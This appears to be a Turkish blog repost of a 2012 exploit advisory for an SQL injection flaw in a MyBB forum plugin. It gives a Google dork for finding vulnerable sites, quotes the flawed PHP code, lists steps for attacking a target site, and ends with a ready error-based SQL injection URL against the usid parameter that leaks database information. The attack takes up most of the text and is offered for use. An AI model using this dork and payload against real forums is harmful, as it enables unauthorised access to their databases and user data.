MyBB Follower User Plugin SQL Injection

Follower User MyBB plugin SQL Injection 0day açığı bulunmuş olup, açığın oluşum yerleri şu şekilde.

Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php
# Date: 13.10.2012
# Exploit Author: Th3FreakPony
# Software Link:
# Version: 1.5+
# Tested on: Linux.

The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():

	$usid = $mybb->input[usid];	//Line 671
	$uid = $mybb->input[uid];	//Line 672
	if(user_awaiting($uid,$usid))	//Line 781
	{				//Line 782
		redirect("member.php?action=profile&uid=".$usid."#suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
	}				//Line 784


1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:



http://server/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image :


Shotouts goes to FillySec.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir